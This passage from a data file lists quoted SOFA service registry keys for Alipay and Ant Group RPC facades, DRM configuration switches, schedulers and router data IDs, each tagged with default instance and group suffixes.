AwardCampaignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:openinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitoptrade.api.TradeModelCreateFacade:1.0:tradeModelCreateFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AppMngManager:1.0:antbuservice-global-antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:opssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CustomerTagQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.NodeQueryApi:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.kie.KiePackageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.v2.AutoQuoteFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.common.service.facade.test.SchedulerExecuterAutoTest:1.0:lmbFeeNotifyDaemonExecuterAutoTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.gfas.core.service.drm.GfasSwitchDrm.loadSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csmobile.servie.facade.api.RecommendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:caprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.ComplainConclusionSwitchImpl.riskAccumulateScenes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scardcenter.common.service.facade.OfflinepayAlipassTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.prodquery.core.service.drm.PdCoreCacheRefreshDRM.cacheLdcStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","giftprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.intimateprod.common.service.facade.api.IntimateRelationQueryCompactFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-tfs-migration#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileiclib.common.service.facade.product.spi.SecurityProductService:1.0:bic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.service.facade.SnbTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.KBMerchandiseStressTessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdFeatureQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.claimoperation.common.service.ClaimCaseUrgencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.StrategyApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iguapcenter.service.facade.GuapQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finreconchecker.common.service.integration.fundtrade.FinfundTradeQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-securityops-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antcsc.common.service.facade.ds.DataServiceGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.alipayCashVoucher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.72.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.trafficcardsp.common.service.facade.CancelCardServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.PersonalAccountLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antdsm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.counter.api.CounterQueryFacadeV4:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.ops.datasource.gfas.gfasShardingDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoguard.common.service.facade.inspection.api.PcBenefitInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.137.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:miniCommonAuditNodeManagerProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.common.service.facade.spi.AssetsProcessSpiFacade:1.0:assetsProcessSpiFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.common.service.facade.query.GuidQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.secretary.WorkAssistantTaskScheduleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.postmen.spi.MessageSpi:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cxbiz.membersolution.common.service.facade.api.member.UserRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:promoguard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.PayToolFinalizeInZoneService:1.0:discountcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.237.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeexprod.facade.EdeductProductConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.RoleManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.ITransReceiverService:1.0:isupergwfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:zdatafront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdspcore.common.service.facade.api.DispositionActionOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.service.integration.zcbsalescenter.AppointmentHistoryQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_D_RPCS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditbatch@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdabombardier.common.service.facade.product.IotProductPriceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.PublicCategoryQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.201.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_RCREPORTCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.debug.ChangeServiceSyncExecuteDebugFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.ignoreFundStatusCheckProductIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.identity.OrganizationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.PermissionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.emotion.rpc.api.EmotionPackageRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.tr.meta.MetaStorageClusterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.250.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acwareslifecore.common.service.facade.InstanceAutoRenewalFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acprodapicore.facade.service.SDKServiceFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qasceneanalysis.common.service.facade.gray.SceneCalculateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifinfluxConf:name=com.alipay.fc.comparacenter.confscript.VersionControl.preloadVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.jsonExtensionExchangeCodeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.sitecenter:name=com.alipay.sitecenter.chair.Config.isCloseFeedback,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.finriskcenter.common.facade.api.guardian.ImmuneRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmportal.service.loan.api.PromoProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.SpaceManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.KaProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.biz.flow.service.PromotionMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.revcore.obrevcore_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:minicenterTaskPackPointCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.FundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:authweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.union.MerchantUnionQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_DBACKPRODRECEIPT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.riskmng.riskmngPartnerDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.ebpp.QueryConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.TemporarySwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.asset.VcpAssetManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.equity.index.CampIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insdataprod.common.service.facade.rest.ScqlQueryService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardPayQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.55.209.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:orderTaskProcessCallBackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.acquirecenter.common.service.facade.api.ConfirmApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.bg.api.cache.BgCacheQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.trigger.FinTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.CIMonitorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.zcache.tbase.agdsSellerWhiteListTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paymentmng.service.facade.payacceptance.PaccFlowNodeManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instradeprod.common.service.InsClaimAcceptanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.product.ProductMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:csassistant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FINRESEARCH_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.idpatrol.core.service.bizCoverage.BcmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcie.common.service.facade.StrategyLDCFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:cashbook@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.pressure.PressureRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.koa-patch:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_ALIFI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng_priceUpgradeAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.olive.facade.api.tenant.TenantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.healthCheckTimeoutExecutorQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dataprofiling@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.rewardBudgetInsufficientDayFrequency,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_6400_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.alipaymember.common.service.facade.config.service.NaviConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DEEPSIS#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.160.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileha.facade.antha.AnthaQuestionDocFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.93.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassetcore.common.service.faasset.ProductClassifyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appfuse.biz.service.InvokeProxyService:1.0:openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.metadata.conf.cache.LoadCacheSwitch.loadCaheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileaec.common.service.facade.AecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.facade.businesstype.BusinessTypeMapFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprodfactory.common.service.InsPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:bizfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:ikbservcenter#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zcbsalescenter.biz.shared.service.AccorderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.221.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.rule.core.publish.drm.RulePublishResource.threadConfigurations,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imif.iasset.common.service.facade.api.IassetCodeApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.peerpayprod.senior.common.service.facade.family.api.FastMockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.PersonasQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bstsolprod.instalment.facade.api.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditdatacenter.facade.service.ConsumeDataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifecore.client.insproductcore.InsProductCoreServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacontextlib.service.facade.dataswap.DataSwapProduceService:1.0:${datacontext_service_unique_id}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeviceprod.common.service.facade.policy.DevicePolicyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.gfas.core.config.drm.GfasDrmResource.exchangeAdvice,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.exratecenter.service.facade.api.ExClientRateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.cifin.uniintegration.core.service.drm.UserviewCompensateDrmResource.proxyUv,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepep.common.acl.PermissionManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbposprod.common.service.facade.api.KdsInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.rayag.facade.service.monitor.JobRuntimeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.ConsumeServiceFacade:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.rule.transfer.TransferRuleManager:1.0:treasuryTransferRuleManagerImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.openplatform.facade.searchsolution.api.SearchSolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.CapitalPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdispatcher.common.service.dispatch.facade.api.ServiceDispatchMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:resmng-bankAccountPMCCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.CTURuleExcludeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finfundmng-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finstore.common.service.facade.fop.mng.WorkbenchGoalMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.indicator.api.ICeresDBIndicatorWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue17#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ebppprod.common.service.facade.recharge.RechargeMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.ShopConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfinlease.common.service.facade.cloudfunds.api.AgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.162.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.activity.ActivitySignInFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:transferprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.core.service.repository.BusinesstypePropsRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mrchiscore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.antha.AnthaWarningDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_DATA-WAREHOUSE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ebppcore.facade.query.ProductConfQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@malgo#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.unitestcenter.falcon.common.facade.TradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-coffeepayweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.aclinkedcore.common.service.facade.PipelineExecutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.29.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassistantmng.common.service.facade.api.InspectSuitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.RoleServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitcore.common.severless.facade.spi.paychecker.SpiBenefitSendOrderQueryFacade:1.0:fundapplicationnyo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:payrouter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.miniProgramBusinessConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.meshysale.common.service.facade.kmi.LeadsCryptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:graymng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.content.UnicodeShowAppSceneResource.unicodeNameListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acspcore.common.service.Boss2ProductServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ISUPERMAN#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_XL_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_SOFA4DEMO_CMPR#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.ServiceChanelQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accrmcore.common.service.facade.CustomerOutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ialicore:name=com.ipay.ialicore.common.drm.ZoneRuleDrm.downZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.huanyu.facade.core.role.RoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:developerforumkoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.ApiAccessControlFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesecurity.common.spi.approve.MobileApproveSpiService:1.0:securitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.gzone.signup.SignUpServiceGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custcenter.service.facade.ResourceViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cloud.apfasmng.common.service.facade.admin.ServerlessPaasAdminFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.amct.facade.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.accreditcore.common.service.facade.CreditAccountLogQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP